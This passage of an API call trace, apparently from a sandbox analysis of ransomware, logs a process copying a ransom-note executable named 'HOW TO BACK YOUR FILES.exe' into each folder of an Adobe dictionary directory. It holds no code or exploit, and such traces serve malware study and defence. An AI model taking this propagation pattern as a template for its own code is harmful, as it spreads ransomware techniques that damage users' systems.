HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\spn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.781] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.781] GetLastError () returned 0x0 [0110.781] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.781] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.781] CloseHandle (hObject=0x120) returned 1 [0110.782] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d2ca40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d2ca40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.782] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.782] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.782] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt" [0110.782] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt" [0110.782] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.782] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\prt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.783] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.783] GetLastError () returned 0x0 [0110.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.783] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.784] CloseHandle (hObject=0x120) returned 1 [0110.784] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d52ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d52ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.784] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.784] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.784] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw" [0110.784] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw" [0110.784] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.785] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\nrw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.785] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.786] GetLastError () returned 0x0 [0110.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.786] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.786] CloseHandle (hObject=0x120) returned 1 [0110.786] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d52ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d52ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.786] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.786] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.787] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl" [0110.787] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl" [0110.787] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.787] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\itl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.788] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.788] GetLastError () returned 0x0 [0110.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.788] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.788] CloseHandle (hObject=0x120) returned 1 [0110.788] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.788] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d52ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d52ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.788] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.788] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.789] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm" [0110.789] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm" [0110.789] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.789] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\grm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.790] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.790] GetLastError () returned 0x0 [0110.790] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.790] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.790] CloseHandle (hObject=0x120) returned 1 [0110.790] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.791] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.791] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.791] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn" [0110.791] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn" [0110.791] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.791] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\frn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.792] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.792] GetLastError () returned 0x0 [0110.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.792] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.792] CloseHandle (hObject=0x120) returned 1 [0110.792] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.793] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.793] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.793] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng" [0110.793] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng" [0110.793] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.793] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\eng\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.794] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.794] GetLastError () returned 0x0 [0110.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.794] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.794] CloseHandle (hObject=0x120) returned 1 [0110.795] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.795] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.795] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.795] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.795] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut" [0110.795] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut" [0110.795] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.795] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dut\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.796] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.796] GetLastError () returned 0x0 [0110.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.796] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.796] CloseHandle (hObject=0x120) returned 1 [0110.797] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.797] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50d78d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50d78d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.797] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.797] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.797] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan" [0110.797] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan") returned="C:\\Users\\5p5NrGJn0jS 